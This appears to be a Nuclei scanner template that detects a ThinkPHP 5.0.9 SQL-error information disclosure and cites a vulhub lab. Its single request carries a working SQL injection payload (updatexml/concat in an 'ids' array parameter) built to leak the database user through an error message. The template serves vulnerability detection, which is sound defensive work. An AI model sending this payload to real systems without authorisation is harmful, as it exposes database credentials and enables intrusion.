id: thinkphp-509-information-disclosure info: name: ThinkPHP 5.0.9 - Information Disclosure author: dr_set severity: critical description: ThinkPHP 5.0.9 includes verbose SQL error message that can reveal sensitive information including database credentials. reference: - https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/in-sqlinjection tags: thinkphp requests: - method: GET path: - "{{BaseURL}}/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1" matchers-condition: and matchers: - type: word condition: and words: - "SQLSTATE" - "XPATH syntax error" - type: status status: - 500 # Enhanced by mp on 2022/04/20